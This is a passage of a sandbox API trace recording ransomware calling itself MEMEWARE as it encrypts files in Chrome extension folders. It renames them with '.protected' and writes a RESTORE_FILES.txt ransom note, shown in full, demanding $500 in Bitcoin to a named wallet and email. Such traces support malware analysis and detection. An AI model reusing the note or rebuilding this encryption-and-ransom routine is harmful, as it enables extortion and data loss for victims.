lpString2="Program Files (x86)") returned -1 [0080.220] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0080.220] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0080.220] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0080.220] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.220] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.220] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0080.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0080.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0080.220] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0080.221] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.221] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0080.221] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.222] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.222] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.222] CloseHandle (hObject=0x164) returned 1 [0080.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.protected") returned 170 [0080.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0080.222] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0080.222] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0080.223] lstrcmpW 
(lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0080.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0080.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0080.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0080.224] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, 
lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.235] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.235] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.236] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.236] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.236] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.236] CloseHandle (hObject=0x164) returned 1 [0080.236] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.protected") returned 172 [0080.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.protected")) returned 1 [0080.237] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.237] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.237] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0080.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.247] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.247] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.248] lstrlenA (lpString="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") returned 684 [0080.248] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.248] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.248] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.248] CloseHandle (hObject=0x160) returned 1 [0080.248] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0080.248] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0080.249] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\RESTORE_FILES.txt") returned 147 [0080.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0080.249] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.249] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0080.250] lstrlenA (lpString="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") returned 684 [0080.250] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0080.250] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.250] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.250] CloseHandle (hObject=0x15c) returned 1 [0080.251] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0080.251] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0080.251] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\RESTORE_FILES.txt") returned 141 [0080.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0080.251] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.251] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0080.252] lstrlenA (lpString="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") returned 684 [0080.252] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0080.252] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.252] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.252] CloseHandle (hObject=0x158) returned 1 [0080.252] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0080.252] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Windows") returned -1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files") returned -1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files (x86)") returned -1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="$Recycle.bin") returned 1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="System Volume Information") returned -1 [0080.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned 123 [0080.253] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2=".") returned 1 [0080.253] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="..") returned 1 [0080.253] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*") returned 125 [0080.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0080.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.253] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.254] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.254] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.254] 
lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.254] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\.") returned 125 [0080.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.254] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.254] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.254] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.254] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.254] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.254] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.254] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\..") returned 126 [0080.254] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.254] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="Windows") returned -1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="Program Files") returned -1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="Program Files (x86)") returned -1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="$Recycle.bin") returned 1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="System Volume Information") returned -1 [0080.254] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0") returned 129 [0080.254] lstrcmpW (lpString1="1.4_0", lpString2=".") returned 1 [0080.254] lstrcmpW (lpString1="1.4_0", lpString2="..") returned 1 [0080.254] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*") returned 131 [0080.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0080.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.276] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.276] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.276] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.276] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\.") returned 131 [0080.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.277] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.277] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.277] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.277] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.277] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.277] wnsprintfW (in: 
